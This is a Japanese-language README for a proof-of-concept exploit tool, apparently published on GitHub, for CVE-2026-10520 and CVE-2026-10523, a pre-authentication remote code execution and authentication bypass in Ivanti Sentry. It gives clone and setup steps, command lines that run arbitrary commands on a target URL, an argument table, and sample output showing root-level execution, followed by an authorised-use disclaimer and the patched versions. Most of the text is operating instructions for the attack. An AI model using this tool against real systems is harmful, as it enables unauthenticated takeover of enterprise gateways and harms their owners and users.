
CVE-2026-10520
プリ認証リモートコード実行 + 認証バイパス
作成者: Ashraf Zaryouh "0xBlackash"
Ivanti Sentry(旧MobileIron Sentry)に影響する2つの重大な脆弱性:
これらの欠陥により、認証されていない攻撃者がシステム全体を完全に制御できる可能性があります。
python3 CVE-2026-10520.py --url <TARGET> --cmd <COMMAND>
# 基本的な使い方
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "id"
# 冗長モード
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "whoami" -v
# プロキシ使用時
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "uname -a" --proxy 127.0.0.1:8080
# カーネル確認
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "uname -a"
git clone https://github.com/0xBlackash/CVE-2026-10520.git
cd CVE-2026-10520
chmod +x CVE-2026-10520.py
脆弱な場合、以下のように表示されます:
██████╗ ██╗ ██╗██████╗ ██╗ █████╗ ██████╗██╗ ██╗ █████╗ ███████╗██╗ ██╗
██╔═████╗╚██╗██╔╝██╔══██╗██║ ██╔══██╗██╔════╝██║ ██╔╝██╔══██╗██╔════╝██║ ██║
██║██╔██║ ╚███╔╝ ██████╔╝██║ ███████║██║ █████╔╝ ███████║███████╗███████║
████╔╝██║ ██╔██╗ ██╔══██╗██║ ██╔══██║██║ ██╔═██╗ ██╔══██║╚════██║██╔══██║
╚██████╔╝██╔╝ ██╗██████╔╝███████╗██║ ██║╚██████╗██║ ██╗██║ ██║███████║██║ ██║
╚═════╝ ╚═╝ ╚═╝╚═════╝ ╚══════╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝
CVE-2026-10520 & CVE-2026-10523 PoC Exploit
Ivanti Sentry Pre-Auth RCE + Auth Bypass
Author: Ashraf Zaryouh "0xBlackash"
GitHub: https://github.com/0xBlackash
[+] Target is VULNERABLE!
Command Output:
uid=0(root) gid=0(root) groups=0(root)
このツールは教育目的および許可されたセキュリティテスト専用です。
あなたが所有していないシステムに対する不正使用は違法です。
作成者は誤用に対する一切の責任を負いません。
修正バージョン: 10.5.2 / 10.6.2 / 10.7.1
Ashraf Zaryouh "0xBlackash" によって ❤️ を込めて作成されました
便利だと思ったらレポジトリにスターをお願いします! ⭐
| 引数 | 説明 | 必須 |
|---|
--url | ターゲットURL(例:https://target:8443) | はい |
--cmd | 実行するコマンド | はい |
-v, --verbose | 冗長出力を有効化 | いいえ |
--proxy | HTTPプロキシ(host:port) | いいえ |